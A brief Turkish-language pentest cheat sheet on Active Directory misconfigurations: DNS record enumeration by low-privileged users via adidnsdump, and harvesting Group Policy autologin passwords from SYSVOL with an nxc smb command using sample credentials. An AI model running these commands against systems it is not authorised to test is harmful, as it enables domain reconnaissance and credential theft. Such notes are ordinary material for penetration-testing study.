Misconfigs

DNS Record

• Default olarak AD ortamlarında, düşük yetkili bir kullanıcı bütün dns kayıtlarını listeleyebilir.

• Bu yöntem ile domain hakkında daha fazla bilgimiz olur.

adidnsdump -u corp.local\\john ldap://172.16.5.5 -r

GPP Autologin

• Bazen sysvol içinde autologin için parola saklanabilir.

• Sysvol default olarak bütün kullanıcılar tarafından okunabilir.

nxc smb 172.16.5.5 -u john -p pass123 -M gpp_autologin